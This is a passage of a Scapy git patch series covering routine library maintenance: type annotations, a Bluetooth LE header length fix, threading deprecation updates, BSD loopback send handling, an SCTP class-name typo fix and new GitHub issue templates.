self).__init__( + name, default, + default_readable=False, + context=context, + implicit_tag=implicit_tag, + explicit_tag=explicit_tag + ) def get_flags(self, pkt): + # type: (ASN1_Packet) -> List[str] fbytes = getattr(pkt, self.name).val return [self.mapping[i] for i, positional in enumerate(fbytes) if positional == '1' and i < len(self.mapping)] def i2repr(self, pkt, x): + # type: (ASN1_Packet, Any) -> str if x is not None: pretty_s = ", ".join(self.get_flags(pkt)) return pretty_s + " " + repr(x) diff --git a/scapy/asn1packet.py b/scapy/asn1packet.py index 759ec58f686..d0a16b0c01c 100644 --- a/scapy/asn1packet.py +++ b/scapy/asn1packet.py @@ -14,22 +14,42 @@ from scapy.packet import Packet import scapy.modules.six as six +from scapy.compat import ( + Any, + Dict, + Tuple, + Type, + cast, + TYPE_CHECKING, +) + +if TYPE_CHECKING: + from scapy.asn1fields import ASN1F_field # noqa: F401 + class ASN1Packet_metaclass(Packet_metaclass): - def __new__(cls, name, bases, dct): + def __new__(cls, # type: ignore + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type[ASN1_Packet] if dct["ASN1_root"] is not None: dct["fields_desc"] = dct["ASN1_root"].get_fields_list() return super(ASN1Packet_metaclass, cls).__new__(cls, name, bases, dct) -class ASN1_Packet(six.with_metaclass(ASN1Packet_metaclass, Packet)): - ASN1_root = None +@six.add_metaclass(ASN1Packet_metaclass) +class ASN1_Packet(Packet): + ASN1_root = cast('ASN1F_field[Any, Any]', None) ASN1_codec = None def self_build(self): + # type: () -> bytes if self.raw_packet_cache is not None: return self.raw_packet_cache return self.ASN1_root.build(self) def do_dissect(self, x): + # type: (bytes) -> bytes return self.ASN1_root.dissect(self, x) diff --git a/scapy/config.py b/scapy/config.py index fb64f2fbcdd..07753744886 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -694,7 +694,8 @@ class Conf(ConfClass): iface = Interceptor("iface", None, _iface_changer) # type: 'scapy.interfaces.NetworkInterface' # type: ignore # noqa: E501 layers = LayersList() commands = CommandsList() # type: CommandsList - ASN1_default_codec = None #: Codec used by default for ASN1 objects + #: Codec used by default for ASN1 objects + ASN1_default_codec = None # type: 'scapy.asn1.asn1.ASN1Codec' AS_resolver = None #: choose the AS resolver class to use dot15d4_protocol = None # Used in dot15d4.py logLevel = Interceptor("logLevel", log_scapy.level, _loglevel_changer) diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index f6e17b45351..ecfb76dc8ce 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -1,4 +1,5 @@ % Regression tests for isotp_scan +~ not_pypy vcan_socket needs_root * Some tests are disabled to lower the CI utilitzation ~ vcan_socket diff --git a/test/regression.uts b/test/regression.uts index 972af2f8cd7..fadfd48728f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1282,7 +1282,7 @@ a = ASN1_DECODING_ERROR("error", exc=OSError(1)) assert repr(a) == "" b = ASN1_DECODING_ERROR("error", exc=OSError(ASN1_BIT_STRING("0"))) assert repr(b) in ["}}>", - "}}>"] + "}}>"] = ASN1 - ASN1_INTEGER a = ASN1_INTEGER(int("1"*23)) From c620438ff955c91943ff98d94f9b2fed07be0379 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 1 Jun 2021 21:51:39 +0200 Subject: [PATCH 0591/1632] Apply suggestion Co-authored-by: Pierre Lalet --- scapy/asn1/asn1.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index d12e2e96b2a..f7ffb72e05c 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -148,7 +148,7 @@ def __init__(self, self._codec = codec def clone(self): # not a real deep copy. self.codec is shared - # type: () -> Any + # type: () -> ASN1Tag return self.__class__(self._key, self._value, self.context, self._codec) # noqa: E501 def register_asn1_object(self, asn1obj): From f77e6c44a32eb0f710a73adb2e9d13cc8b774048 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 3 Jun 2021 09:45:20 +0200 Subject: [PATCH 0592/1632] Better tpacket_auxdata support (#3241) --- scapy/supersocket.py | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 0271c10902b..591cc142f8a 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -58,9 +58,10 @@ def __repr__(self): # Used to get ancillary data -PACKET_AUXDATA = 8 # type: int -ETH_P_8021Q = 0x8100 # type: int -TP_STATUS_VLAN_VALID = 1 << 4 # type: int +PACKET_AUXDATA = 8 +ETH_P_8021Q = 0x8100 +TP_STATUS_VLAN_VALID = 1 << 4 +TP_STATUS_VLAN_TPID_VALID = 1 << 6 class tpacket_auxdata(ctypes.Structure): @@ -71,7 +72,7 @@ class tpacket_auxdata(ctypes.Structure): ("tp_mac", ctypes.c_ushort), ("tp_net", ctypes.c_ushort), ("tp_vlan_tci", ctypes.c_ushort), - ("tp_padding", ctypes.c_ushort), + ("tp_vlan_tpid", ctypes.c_ushort), ] # type: List[Tuple[str, Any]] @@ -144,9 +145,12 @@ def _recv_raw(self, sock, x): if auxdata.tp_vlan_tci != 0 or \ auxdata.tp_status & TP_STATUS_VLAN_VALID: # Insert VLAN tag + tpid = ETH_P_8021Q + if auxdata.tp_status & TP_STATUS_VLAN_TPID_VALID: + tpid = auxdata.tp_vlan_tpid tag = struct.pack( "!HH", - ETH_P_8021Q, + tpid, auxdata.tp_vlan_tci ) pkt = pkt[:12] + tag + pkt[12:] From ccfb365fa6c47bd1df5558a17be0a123ed28e59f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 31 May 2021 00:50:43 +0200 Subject: [PATCH 0593/1632] Fix BTLE ADV length --- scapy/fields.py | 8 ++--- scapy/layers/bluetooth4LE.py | 51 ++++++++++++++++++++++-------- test/scapy/layers/bluetooth4LE.uts | 8 +++++ 3 files changed, 49 insertions(+), 18 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 34b2cb2261f..2369119de42 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2432,12 +2432,10 @@ def any2i_one(self, pkt, x): class BitEnumField(_BitField[Union[List[int], int]], _EnumField[int]): __slots__ = EnumField.__slots__ - def __init__(self, name, default, size, enum): - # type: (str, Optional[int], int, Dict[int, str]) -> None + def __init__(self, name, default, size, enum, **kwargs): + # type: (str, Optional[int], int, Dict[int, str], **Any) -> None _EnumField.__init__(self, name, default, enum) - self.rev = size < 0 - self.size = abs(size) - self.sz = self.size / 8. # type: ignore + _BitField.__init__(self, name, default, size, **kwargs) def any2i(self, pkt, x): # type: (Optional[Packet], Any) -> Union[List[int], int] diff --git a/scapy/layers/bluetooth4LE.py b/scapy/layers/bluetooth4LE.py index 40f8b0bb5f1..eac567455ea 100644 --- a/scapy/layers/bluetooth4LE.py +++ b/scapy/layers/bluetooth4LE.py @@ -13,11 +13,27 @@ from scapy.data import DLT_BLUETOOTH_LE_LL, DLT_BLUETOOTH_LE_LL_WITH_PHDR, \ PPI_BTLE from scapy.packet import Packet, bind_layers -from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - Field, FlagsField, LEIntField, LEShortEnumField, LEShortField, \ - MACField, PacketListField, SignedByteField, X3BytesField, XBitField, \ - XByteField, XIntField, XShortField, XLEIntField, XLELongField, \ - XLEShortField +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + Field, + FlagsField, + LEIntField, + LEShortEnumField, + LEShortField, + MACField, + PacketListField, + SignedByteField, + X3BytesField, + XByteField, + XIntField, + XLEIntField, + XLELongField, + XLEShortField, + XShortField, +) from scapy.contrib.ethercat import LEBitEnumField, LEBitField from scapy.layers.bluetooth import EIR_Hdr, L2CAP_Hdr @@ -225,15 +241,24 @@ def hashret(self): class BTLE_ADV(Packet): + # BT Core 5.2 - 2.3 ADVERTISING PHYSICAL CHANNEL PDU name = "BTLE advertising header" fields_desc = [ - BitEnumField("RxAdd", 0, 1, {0: "public", 1: "random"}), - BitEnumField("TxAdd", 0, 1, {0: "public", 1: "random"}), - BitField("RFU", 0, 2), # Unused - BitEnumField("PDU_type", 0, 4, {0: "ADV_IND", 1: "ADV_DIRECT_IND", 2: "ADV_NONCONN_IND", 3: "SCAN_REQ", # noqa: E501 - 4: "SCAN_RSP", 5: "CONNECT_REQ", 6: "ADV_SCAN_IND"}), # noqa: E501 - BitField("unused", 0, 2), # Unused - XBitField("Length", None, 6), + BitEnumField("RxAdd", 0, 1, {0: "public", + 1: "random"}), + BitEnumField("TxAdd", 0, 1, {0: "public", + 1: "random"}), + # 4.5.8.3.1 - LE Channel Selection Algorithm #2 + BitEnumField("ChSel", 0, 1, {1: "#2"}), + BitField("RFU", 0, 1), # Unused + BitEnumField("PDU_type", 0, 4, {0: "ADV_IND", + 1: "ADV_DIRECT_IND", + 2: "ADV_NONCONN_IND", + 3: "SCAN_REQ", + 4: "SCAN_RSP", + 5: "CONNECT_REQ", + 6: "ADV_SCAN_IND"}), + XByteField("Length", None), ] def post_build(self, p, pay): @@ -243,7 +268,7 @@ def post_build(self, p, pay): l_pay = len(pay) else: l_pay = 0 - p = p[:1] + chb(l_pay & 0x3f) + p[2:] + p = p[:1] + chb(l_pay & 0xff) + p[2:] if not isinstance(self.underlayer, BTLE): self.add_underlayer(BTLE) return p diff --git a/test/scapy/layers/bluetooth4LE.uts b/test/scapy/layers/bluetooth4LE.uts index a8cffcc0766..33a0ee694b8 100644 --- a/test/scapy/layers/bluetooth4LE.uts +++ b/test/scapy/layers/bluetooth4LE.uts @@ -24,6 +24,14 @@ a = BTLE(raw(a)) assert a[BTLE_DATA].len == 4 assert a[Raw].load == b"toto" += Longer BTLE_ADV + +a = BTLE()/BTLE_ADV()/BTLE_CONNECT_REQ()/(b"X"*200) +assert raw(a) == b'\xd6\xbe\x89\x8e\x05\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXI\xfc\xcf' +pkt = BTLE(raw(a)) +assert pkt.Length == 0xea +assert pkt.load == b"X" * 200 + = BTLE_DATA + EIR_ShortenedLocalName test1 = BTLE() / BTLE_ADV() / BTLE_ADV_IND() / EIR_Hdr() / EIR_ShortenedLocalName(local_name= 'wussa') From a6bf8dd8b6c6ba7e41608c5dc3944ac98c8af59c Mon Sep 17 00:00:00 2001 From: Karthikeyan Singaravelan Date: Mon, 31 May 2021 06:39:02 +0000 Subject: [PATCH 0594/1632] Fix threading related deprecations in Python 3.10. --- scapy/automaton.py | 4 ++-- scapy/pipetool.py | 2 +- scapy/sendrecv.py | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index 8d1df840ea7..eeb58d14922 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -742,13 +742,13 @@ def _do_start(self, *args, **kargs): kwargs=kargs, name="scapy.automaton _do_start" ) - _t.setDaemon(True) + _t.daemon = True _t.start() ready.wait() def _do_control(self, ready, *args, **kargs): with self.started: - self.threadid = threading.currentThread().ident + self.threadid = threading.current_thread().ident # Update default parameters a = args + self.init_args[len(args):] diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 70b8d202b72..4097c0c4eca 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -146,7 +146,7 @@ def run(self): def start(self): if self.thread_lock.acquire(0): _t = Thread(target=self.run, name="scapy.pipetool.PipeEngine") - _t.setDaemon(True) + _t.daemon = True _t.start() self.thread = _t else: diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index f97fc4153ee..75d96f1d4b6 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -174,7 +174,7 @@ def __init__(self, snd_thread = Thread( target=self._sndrcv_snd ) - snd_thread.setDaemon(True) + snd_thread.daemon = True # Start routine with callback self._sndrcv_rcv(snd_thread.start) @@ -1015,7 +1015,7 @@ def _setup_thread(self): kwargs=self.kwargs, name="AsyncSniffer" ) - self.thread.setDaemon(True) + self.thread.daemon = True def _run(self, count=0, # type: int From 2da3800b87702178a0f60598aebdd7335ce5603d Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 16 Jun 2021 07:38:41 +0200 Subject: [PATCH 0595/1632] Fix codespell --- doc/scapy/layers/bluetooth.rst | 2 +- scapy/arch/windows/__init__.py | 2 +- scapy/layers/dot11.py | 2 +- scapy/layers/tls/crypto/suites.py | 10 +++++----- 4 files changed, 8 insertions(+), 8 deletions(-) diff --git a/doc/scapy/layers/bluetooth.rst b/doc/scapy/layers/bluetooth.rst index f87184ef00a..1e8b0c69161 100644 --- a/doc/scapy/layers/bluetooth.rst +++ b/doc/scapy/layers/bluetooth.rst @@ -471,7 +471,7 @@ This example sets up a virtual iBeacon: # Beacon data consists of a UUID, and two 16-bit integers: "major" and # "minor". # - # iBeacon sits ontop of Apple's BLE protocol. + # iBeacon sits on top of Apple's BLE protocol. p = Apple_BLE_Submessage()/IBeacon_Data( uuid='fb0b57a2-8228-44cd-913a-94a122ba1206', major=1, minor=2) diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 3e640f480c8..381ec8da418 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -855,7 +855,7 @@ def _route_add_loopback(routes=None, ipv6=False, iflist=None): warning("Calling _route_add_loopback is only valid on Windows") return warning("This will completely mess up the routes. Testing purpose only !") - # Add only if some adpaters already exist + # Add only if some adapters already exist if ipv6: if not conf.route6.routes: return diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 090e387a59f..5ae42536b39 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1192,7 +1192,7 @@ class Dot11EltRSN(Dot11Elt): BitField("no_pairwise", 0, 1), BitField("pre_auth", 0, 1), BitField("reserved", 0, 8), - # Theorically we could use mfp_capable/mfp_required to know if those + # Theoretically we could use mfp_capable/mfp_required to know if those # fields are present, but some implementations poorly implement it. # In practice, do as wireshark: guess using offset. ConditionalField( diff --git a/scapy/layers/tls/crypto/suites.py b/scapy/layers/tls/crypto/suites.py index 484970c51d2..b3fa8c11cb2 100644 --- a/scapy/layers/tls/crypto/suites.py +++ b/scapy/layers/tls/crypto/suites.py @@ -1308,12 +1308,12 @@ def get_usable_ciphersuites(li, kx): res = [] for c in li: if c in _tls_cipher_suites_cls: - ciph = _tls_cipher_suites_cls[c] - if ciph.usable: + cipher = _tls_cipher_suites_cls[c] + if cipher.usable: # XXX select among RSA and ECDSA cipher suites # according to the key(s) the server was given - if (ciph.kx_alg.anonymous or - kx in ciph.kx_alg.name or - ciph.kx_alg.name == "TLS13"): + if (cipher.kx_alg.anonymous or + kx in cipher.kx_alg.name or + cipher.kx_alg.name == "TLS13"): res.append(c) return res From fb5fab018b0e64e57c9a54f609cb7c45cc43e54a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 16 Jun 2021 07:47:18 +0200 Subject: [PATCH 0596/1632] Change default basecls for HSFZ convenience sockets --- doc/scapy/layers/automotive.rst | 2 +- scapy/contrib/automotive/bmw/definitions.py | 2 +- scapy/contrib/automotive/bmw/hsfz.py | 20 +++++++------------- 3 files changed, 9 insertions(+), 15 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 285274d556a..48969089a72 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -30,7 +30,7 @@ function to get all information about one specific protocol. | +----------------------+--------------------------------------------------------+ | | SOME/IP | SOMEIP, SD | | +----------------------+--------------------------------------------------------+ -| | BMW HSFZ | HSFZ, HSFZSocket, ISOTP_HSFZSocket | +| | BMW HSFZ | HSFZ, HSFZSocket, UDS_HSFZSocket | | +----------------------+--------------------------------------------------------+ | | OBD | OBD, OBD_S0[0-9A] | | +----------------------+--------------------------------------------------------+ diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index a2c90e7eedc..19a0dce6c9a 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -362,7 +362,7 @@ class READ_MEM_PR(Packet): class WEBSERVER(Packet): fields_desc = [ ByteField('enable', 1), - ThreeBytesField('password', b'123') + ThreeBytesField('password', 0x10203) ] diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index e5d398864f6..b923de3dbfb 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -18,8 +18,6 @@ from scapy.layers.inet import TCP from scapy.supersocket import StreamSocket from scapy.contrib.automotive.uds import UDS -from scapy.contrib.isotp import ISOTP -from scapy.error import Scapy_Exception from scapy.data import MTU @@ -83,32 +81,28 @@ def __init__(self, ip='127.0.0.1', port=6801): StreamSocket.__init__(self, s, HSFZ) -class ISOTP_HSFZSocket(HSFZSocket): - def __init__(self, src, dst, ip='127.0.0.1', port=6801, basecls=ISOTP): +class UDS_HSFZSocket(HSFZSocket): + def __init__(self, src, dst, ip='127.0.0.1', port=6801, basecls=UDS): # type: (int, int, str, int, Type[Packet]) -> None - super(ISOTP_HSFZSocket, self).__init__(ip, port) + super(UDS_HSFZSocket, self).__init__(ip, port) self.src = src self.dst = dst self.basecls = HSFZ self.outputcls = basecls def send(self, x): - # type: (bytes) -> int - if not isinstance(x, ISOTP): - raise Scapy_Exception( - "Please provide a packet class based on ISOTP") + # type: (Packet) -> int try: x.sent_time = time.time() except AttributeError: pass - return super(ISOTP_HSFZSocket, self).send( - HSFZ(src=self.src, dst=self.dst) / x - ) + return super(UDS_HSFZSocket, self).send( + HSFZ(src=self.src, dst=self.dst) / x) def recv(self, x=MTU): # type: (int) -> Optional[Packet] - pkt = super(ISOTP_HSFZSocket, self).recv(x) + pkt = super(UDS_HSFZSocket, self).recv(x) if pkt: return self.outputcls(bytes(pkt.payload)) else: From 3cb3d1cce52ba1f91358348c4d80d79fb44b62d7 Mon Sep 17 00:00:00 2001 From: Alex Mages Date: Sun, 20 Jun 2021 17:32:40 -0500 Subject: [PATCH 0597/1632] SCTPChunkParamHearbeatInfo corrected to SCTPChunkParamHeartbeatInfo --- scapy/layers/sctp.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/layers/sctp.py b/scapy/layers/sctp.py index df6494fe0e7..4e2d77b089a 100644 --- a/scapy/layers/sctp.py +++ b/scapy/layers/sctp.py @@ -184,7 +184,7 @@ def sctp_checksum(buf): } sctpchunkparamtypescls = { - 1: "SCTPChunkParamHearbeatInfo", + 1: "SCTPChunkParamHeartbeatInfo", 5: "SCTPChunkParamIPv4Addr", 6: "SCTPChunkParamIPv6Addr", 7: "SCTPChunkParamStateCookie", @@ -287,7 +287,7 @@ def extract_padding(self, s): return b"", s[:] -class SCTPChunkParamHearbeatInfo(_SCTPChunkParam, Packet): +class SCTPChunkParamHeartbeatInfo(_SCTPChunkParam, Packet): fields_desc = [ShortEnumField("type", 1, sctpchunkparamtypes), FieldLenField("len", None, length_of="data", adjust=lambda pkt, x:x + 4), From 30252f99e1fb27026bef3a4d7c6e6ababd6b7905 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 1 Jul 2021 02:59:56 +0200 Subject: [PATCH 0598/1632] Ensure that the MAC address is 6 bytes long (#3207) * Ensure that the return MAC address is 6 bytes long * Mock get_if_raw_hwaddr with a long layer address --- scapy/arch/bpf/core.py | 5 +++++ test/regression.uts | 12 ++++++++++++ 2 files changed, 17 insertions(+) diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index d49267cd911..a364782b33e 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -122,6 +122,11 @@ def get_if_raw_hwaddr(ifname): # Pack and return the MAC address mac = addresses[0].split(' ')[1] mac = [chr(int(b, 16)) for b in mac.split(':')] + + # Check that the address length is correct + if len(mac) != 6: + raise Scapy_Exception("No MAC address found on %s !" % ifname) + return (ARPHDR_ETHER, ''.join(mac)) diff --git a/test/regression.uts b/test/regression.uts index fadfd48728f..d560c365617 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -188,6 +188,8 @@ assert p == "127.0.0.1" = Interface related functions +import mock + conf.iface get_if_raw_hwaddr(conf.iface) @@ -207,6 +209,16 @@ get_working_if() get_if_raw_addr6(conf.iface) +if not WINDOWS: + addr = u"lladdr 29:0b:c2:ff:fe:53:21:e9\n" + b = Bunch(returncode=0, communicate=lambda *args, **kargs: (addr, None)) + with mock.patch('scapy.arch.bpf.core.subprocess.Popen', return_value=b) as popen: + try: + scapy.arch.bpf.core.get_if_raw_hwaddr("fw0") + assert False + except Scapy_Exception: + assert True + = More Interfaces related functions # Test name resolution From 6eef12d2de02ec4822c19621fd3847a498ca1387 Mon Sep 17 00:00:00 2001 From: Michael Farrell Date: Sat, 12 Jun 2021 14:12:58 +1000 Subject: [PATCH 0599/1632] BSD/Darwin: fix send() on lo and utun devices The Loopback work-around is only needed for tuntaposx (on Darwin). --- scapy/arch/bpf/supersocket.py | 33 +++++++++++++++++++++++++-------- test/bpf.uts | 20 ++++++++++++++++++++ 2 files changed, 45 insertions(+), 8 deletions(-) diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index d26c1be7d44..8587e6fa6b5 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -390,14 +390,31 @@ def send(self, pkt): self.assigned_interface = iff # Build the frame - if self.guessed_cls == Loopback: - # bpf(4) man page (from macOS, but also for BSD): - # "A packet can be sent out on the network by writing to a bpf - # file descriptor. [...] Currently only writes to Ethernets and - # SLIP links are supported" - # - # Headers are only mentioned for reads, not writes. tuntaposx's tun - # device reports as a "loopback" device, but it does IP. + # + # LINKTYPE_NULL / DLT_NULL (Loopback) is a special case. From the + # bpf(4) man page (from macOS/Darwin, but also for BSD): + # + # "A packet can be sent out on the network by writing to a bpf file + # descriptor. [...] Currently only writes to Ethernets and SLIP links + # are supported." + # + # Headers are only mentioned for reads, not writes, and it has the + # name "NULL" and id=0. + # + # The _correct_ behaviour appears to be that one should add a BSD + # Loopback header to every sent packet. This is needed by FreeBSD's + # if_lo, and Darwin's if_lo & if_utun. + # + # tuntaposx appears to have interpreted "NULL" as "no headers". + # Thankfully its interfaces have a different name (tunX) to Darwin's + # if_utun interfaces (utunX). + # + # There might be other drivers which make the same mistake as + # tuntaposx, but these are typically provided with VPN software, and + # Apple are breaking these kexts in a future version of macOS... so + # the problem will eventually go away. They already don't work on Macs + # with Apple Silicon (M1). + if DARWIN and iff.startswith('tun') and self.guessed_cls == Loopback: frame = raw(pkt) else: frame = raw(self.guessed_cls() / pkt) diff --git a/test/bpf.uts b/test/bpf.uts index 869b4674c33..eea7c51141b 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -145,3 +145,23 @@ s.send(IP(dst="8.8.8.8")/ICMP()) s = L3bpfSocket() s.assigned_interface = conf.loopback_name s.send(IP(dst="8.8.8.8")/ICMP()) + += L3bpfSocket - send and sniff on loopback +~ needs_root + +localhost_ip = conf.ifaces[conf.loopback_name].ips[4][0] + +def cb(): + # Send a ping to the loopback IP. + s = L3bpfSocket(iface=conf.loopback_name) + s.send(IP(dst=localhost_ip)/ICMP(seq=1001)) + +t = AsyncSniffer(iface=conf.loopback_name, started_callback=cb) +t.start() +time.sleep(1) +t.stop() +t.join(timeout=1) + +# We expect to see our packet and kernel's response. +len(t.results.filter(lambda p: ( + IP in p and ICMP in p and (p[IP].src == localhost_ip or p[IP].dst == localhost_ip) and p[ICMP].seq == 1001))) == 2 From 5e7db96ca32fe5d59ba77d2f78ef4b9801a96450 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 25 Jun 2021 18:41:19 +0200 Subject: [PATCH 0600/1632] Use github issue forms --- .github/ISSUE_TEMPLATE.md | 40 ----------------- .github/ISSUE_TEMPLATE/BUGS.yml | 73 +++++++++++++++++++++++++++++++ .github/ISSUE_TEMPLATE/config.yml | 5 +++ 3 files changed, 78 insertions(+), 40 deletions(-) delete mode 100644 .github/ISSUE_TEMPLATE.md create mode 100644 .github/ISSUE_TEMPLATE/BUGS.yml create mode 100644 .github/ISSUE_TEMPLATE/config.yml diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md deleted file mode 100644 index 49b0e2f8c0a..00000000000 --- a/.github/ISSUE_TEMPLATE.md +++ /dev/null @@ -1,40 +0,0 @@ - - -#### Brief description - - - - -#### Environment - -- Scapy version: `scapy version and/or commit-hash` -- Python version: `e.g. 3.5` -- Operating System: `e.g. Minix 3.4` - - - -#### How to reproduce - - - -#### Actual result - - - -#### Expected result - - - -#### Related resources - - diff --git a/.github/ISSUE_TEMPLATE/BUGS.yml b/.github/ISSUE_TEMPLATE/BUGS.yml new file mode 100644 index 00000000000..0ca41fa1754 --- /dev/null +++ b/.github/ISSUE_TEMPLATE/BUGS.yml @@ -0,0 +1,73 @@ +name: Bug Report +description: File a bug report +body: + - type: markdown + attributes: + value: | + ### Things to consider + 1. Please check that you are using the **latest scapy version**, e.g. installed via: + `pip install --upgrade git+git://github.com/secdev/scapy` + 2. If you are here to ask a question - please check previous issues and online resources, and consider using gitter instead: + 3. Please understand that **this is not a forum** but an issue tracker. The following article explains why you should limit questions asked on Github issues: + + ***All bug reports must have at least one reproducible example.*** This may be a code snippet, a pcap file (zipped).. + - type: textarea + id: description + attributes: + label: Brief description + description: | + Describe the main issue in one sentence + If possible, describe what components / protocols could be affected by the issue (e.g. wrpcap() + IPv6, it is likely this also affects XXX) + validations: + required: true + - type: input + id: scapy_ver + attributes: + label: Scapy version + description: Give the scapy version or the commit hash + placeholder: 2.4.5 + validations: + required: true + - type: input + id: py_ver + attributes: + label: Python version + placeholder: "3.8" + validations: + required: true + - type: input + id: os + attributes: + label: Operating system + placeholder: Minix 3.4 + validations: + required: true + - type: textarea + id: add_os + attributes: + label: Additional environment information + description: If needed - further information to get a picture of your setup (e.g. a sketch of your network setup) + validations: + required: false + - type: textarea + id: reproduce + attributes: + label: How to reproduce + description: Step-by-step explanation or a short script, may reference section 'Related resources' + validations: + required: true + - type: textarea + id: result + attributes: + label: Actual result + description: Dump results that outline the issue, please format your code + - type: textarea + id: expected_result + attributes: + label: Expected result + description: Describe the expected result and outline the difference to the actual one, could also be a screen shot (e.g. wireshark) + - type: textarea + id: resources + attributes: + label: Related resources + description: Traces / sample pcaps (stripped to the relevant frames), related standards, RFCs or other resources diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml new file mode 100644 index 00000000000..4c714ebdd2f --- /dev/null +++ b/.github/ISSUE_TEMPLATE/config.yml @@ -0,0 +1,5 @@ +blank_issues_enabled: true +contact_links: + - name: Ask a question + url: https://gitter.im/secdev/scapy + about: Please ask and answer questions on gitter. From 5039baa2e8e777b5cf62aaea004e05cb4da7bdcc Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 1 Jul 2021 02:55:19 +0200 Subject: [PATCH 0601/1632] Apply minor fixes --- .github/ISSUE_TEMPLATE/BUGS.yml | 8 ++++---- .github/ISSUE_TEMPLATE/config.yml | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/.github/ISSUE_TEMPLATE/BUGS.yml b/.github/ISSUE_TEMPLATE/BUGS.yml index 0ca41fa1754..7d4f81c0e59 100644 --- a/.github/ISSUE_TEMPLATE/BUGS.yml +++ b/.github/ISSUE_TEMPLATE/BUGS.yml @@ -5,9 +5,9 @@ body: attributes: value: | ### Things to consider - 1. Please check that you are using the **latest scapy version**, e.g. installed via: + 1. Please check that you are using the **latest Scapy version**, e.g. installed via: `pip install --upgrade git+git://github.com/secdev/scapy` - 2. If you are here to ask a question - please check previous issues and online resources, and consider using gitter instead: + 2. If you are here to ask a question - please check previous issues and online resources, and consider using Gitter instead: 3. Please understand that **this is not a forum** but an issue tracker. The following article explains why you should limit questions asked on Github issues: ***All bug reports must have at least one reproducible example.*** This may be a code snippet, a pcap file (zipped).. @@ -24,7 +24,7 @@ body: id: scapy_ver attributes: label: Scapy version - description: Give the scapy version or the commit hash + description: Give the Scapy version or the commit hash placeholder: 2.4.5 validations: required: true @@ -39,7 +39,7 @@ body: id: os attributes: label: Operating system - placeholder: Minix 3.4 + placeholder: Linux 5.10.46 validations: required: true - type: textarea diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml index 4c714ebdd2f..88315b98cc4 100644 --- a/.github/ISSUE_TEMPLATE/config.yml +++ b/.github/ISSUE_TEMPLATE/config.yml @@ -2,4 +2,4 @@ blank_issues_enabled: true contact_links: - name: Ask a question url: https://gitter.im/secdev/scapy - about: Please ask and answer questions on gitter. + about: Please ask and answer questions on Gitter. From 508cd76811ffc4afe7410c9628262350b33ba29c Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 6 Jul 2021 08:59:29 +0200 Subject: [PATCH 0602/1632] Replace GLOBKEYS by session 